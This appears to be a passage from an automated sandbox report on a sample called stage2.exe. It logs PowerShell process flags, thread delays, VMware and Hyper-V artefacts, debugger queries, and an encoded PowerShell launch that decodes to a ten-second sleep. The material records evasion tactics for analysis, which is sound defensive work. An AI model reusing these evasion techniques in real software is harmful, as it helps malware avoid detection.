    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3260
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1461
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4329
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3659
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmpBinary or memory string: Hyper-V
    Source: Amcache.hve.26.drBinary or memory string: VMware
    Source: Amcache.hve.26.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.26.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427690622.0000000004CA2000.00000004.00000001.sdmpBinary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475815541.0000000004BD3000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.478987968.0000000004B64000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479178780.0000000004BD3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.26.drBinary or memory string: VMware, Inc.me
    Source: WerFault.exe, 0000001A.00000003.473935861.0000000004BD3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.26.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: Amcache.hve.26.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.26.drBinary or memory string: VMware7,1
    Source: Amcache.hve.26.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.26.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.26.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.26.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.26.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
    Source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4}{
    Source: powershell.exe, 0000000D.00000002.431025294.0000000007A94000.00000004.00000001.sdmpBinary or memory string: hell\v1.0\Modules\Hyper-V
    Source: Amcache.hve.26.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpBinary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VhD
    Source: C:\Users\user\Desktop\stage2.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\stage2.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\stage2.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\stage2.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Encrypted powershell cmdline option foundShow sources
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\stage2.exeQueries volume information: C:\Users\user\Desktop\stage2.exe VolumeInformation
    Source: C:\Users\user\Desktop\stage2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
